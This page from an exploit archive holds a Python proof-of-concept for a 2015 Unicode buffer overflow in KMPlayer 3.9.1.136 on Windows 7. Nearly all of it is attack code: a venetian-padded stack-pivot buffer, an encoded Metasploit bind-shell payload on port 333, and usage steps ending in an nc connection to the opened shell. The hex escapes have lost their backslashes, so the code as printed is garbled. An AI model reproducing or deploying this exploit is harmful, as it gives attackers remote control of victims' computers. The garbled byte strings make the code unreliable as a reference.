Home / exploits

PDF

KMPlayer 3.9.1.136 Buffer Overflow

Posted on 24 June 2015

#!/usr/bin/python
#
# KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
#
# Author: Naser Farhadi
#
# Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit)
#
# Usage:
# chmod +x KMPlayer.py
# python KMPlayer.py
# Alt+c | Video Capture | Alt+a | Audio Capture
# paste content of KMPlayer.txt into Filename
# nc 172.20.10.14 333
#
# Video: http://youtu.be/9gtZxR2ioTM
##

buffer = (
 "x50" # PUSH EAX
 "x40" # Venetian Padding
 "x5c" # POP ESP
 "x40" # Venetian Padding
 "x61" # POPAD
 "x45" # Venetian Padding
 ""+("x5fx45" * 125)+"" # (POP EDI/Venetian Padding)*125
 "x54" # PUSH ESP
 "x45" # Venetian Padding
 "x45" # Venetian Padding
 "x45" # Venetian Padding
 "x61" # POPAD
 "x47" # Venetian Padding
 "x33x77" # POP EBP/RETN from KMPlayer.exe
 "x58" # POP EAX
 "x47" # Venetian Padding
 "x33x77" # POP EBP/RETN from KMPlayer.exe
 "x58" # POP EAX
 "x47" # Venetian Padding
 "x33x77" # POP EBP/RETN from KMPlayer.exe
 "x5d" # POP EBP
 "x47" # Venetian Padding
 "x71" # Venetian Padding
 "x71" # Venetian Padding
 )

# msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
shellcode = ("x54x47x59x41x49x41x49x41x49x41x49x41x49x41x49"
 "x41x49x41x49x41x49x41x49x41x49x41x49x41x49x41"
 "x49x41x6ax58x41x51x41x44x41x5ax41x42x41x52x41"
 "x4cx41x59x41x49x41x51x41x49x41x51x41x49x41x68"
 "x41x41x41x5ax31x41x49x41x49x41x4ax31x31x41x49"
 "x41x49x41x42x41x42x41x42x51x49x31x41x49x51x49"
 "x41x49x51x49x31x31x31x41x49x41x4ax51x59x41x5a"
 "x42x41x42x41x42x41x42x41x42x6bx4dx41x47x42x39"
 "x75x34x4ax42x69x6cx39x58x31x72x79x70x4dx30x39"
 "x70x53x30x75x39x67x75x4ex51x35x70x62x44x52x6b"
 "x70x50x6ex50x52x6bx52x32x4cx4cx54x4bx72x32x4b"
 "x64x42x6bx52x52x4dx58x5ax6fx38x37x6fx5ax6cx66"
 "x4cx71x59x6fx36x4cx4dx6cx30x61x51x6cx4ax62x6c"
 "x6cx6fx30x69x31x78x4fx4ax6dx59x71x77x57x67x72"
 "x4bx42x70x52x6ex77x62x6bx6ex72x6ax70x32x6bx6e"
 "x6ax6dx6cx74x4bx30x4cx5ax71x32x58x49x53x70x48"
 "x6dx31x57x61x4ex71x44x4bx61x49x6dx50x6ax61x4a"
 "x33x72x6bx71x39x6ex38x58x63x6dx6ax70x49x62x6b"
 "x6cx74x74x4bx4dx31x58x56x4dx61x69x6fx54x6cx76"
 "x61x78x4fx7ax6dx69x71x47x57x4fx48x57x70x43x45"
 "x58x76x5ax63x61x6dx59x68x6fx4bx61x6dx6cx64x33"
 "x45x57x74x30x58x54x4bx30x58x6dx54x69x71x37x63"
 "x70x66x44x4bx4cx4cx70x4bx34x4bx6fx68x4dx4cx59"
 "x71x68x53x64x4bx6cx44x44x4bx5ax61x78x50x73x59"
 "x51x34x6cx64x6ex44x61x4bx4fx6bx43x31x4fx69x31"
 "x4ax70x51x49x6fx49x50x71x4fx61x4fx70x5ax72x6b"
 "x6cx52x48x6bx64x4dx51x4dx72x48x6cx73x70x32x49"
 "x70x49x70x33x38x43x47x52x53x4dx62x71x4fx4ex74"
 "x70x68x50x4cx44x37x6cx66x6cx47x39x6fx47x65x37"
 "x48x42x70x6ax61x4dx30x39x70x4dx59x37x54x42x34"
 "x30x50x33x38x4bx79x35x30x42x4bx59x70x4bx4fx46"
 "x75x31x5ax39x78x30x59x30x50x37x72x39x6dx31x30"
 "x42x30x4dx70x72x30x61x58x38x6ax4cx4fx57x6fx77"
 "x70x79x6fx66x75x56x37x53x38x6bx52x39x70x79x71"
 "x4ex6dx61x79x67x76x62x4ax4ax70x52x36x6ex77x51"
 "x58x57x52x59x4bx70x37x62x47x49x6fx38x55x72x37"
 "x42x48x74x77x69x59x4fx48x69x6fx69x6fx76x75x6f"
 "x67x63x38x52x54x5ax4cx4fx4bx68x61x79x6fx68x55"
 "x31x47x46x37x62x48x54x35x72x4ex6ex6dx50x61x69"
 "x6fx77x65x63x38x62x43x62x4dx42x44x6dx30x75x39"
 "x58x63x32x37x6ex77x50x57x50x31x6ax56x71x5ax6e"
 "x32x32x39x51x46x59x52x49x6dx52x46x38x47x70x44"
 "x4fx34x4fx4cx4dx31x6bx51x74x4dx6ex64x6fx34x6c"
 "x50x76x66x6bx50x6ex64x51x44x32x30x50x56x71x46"
 "x6ex76x4fx56x70x56x50x4ex62x36x6fx66x70x53x71"
 "x46x51x58x54x39x46x6cx6dx6fx31x76x4bx4fx79x45"
 "x34x49x59x50x50x4ex6fx66x50x46x4bx4fx30x30x63"
 "x38x6cx48x54x47x6dx4dx33x30x39x6fx66x75x75x6b"
 "x68x70x37x45x44x62x30x56x53x38x54x66x74x55x65"
 "x6dx53x6dx4bx4fx79x45x6dx6cx59x76x43x4cx6ax6a"
 "x35x30x4bx4bx59x50x70x75x6bx55x55x6bx30x47x7a"
 "x73x33x42x50x6fx30x6ax59x70x32x33x6bx4fx79x45"
 "x41x41")

buffer += shellcode + "x71" * (1534 - len(shellcode))

open("KMPlayer.txt", "wb").write(buffer)

 

TOP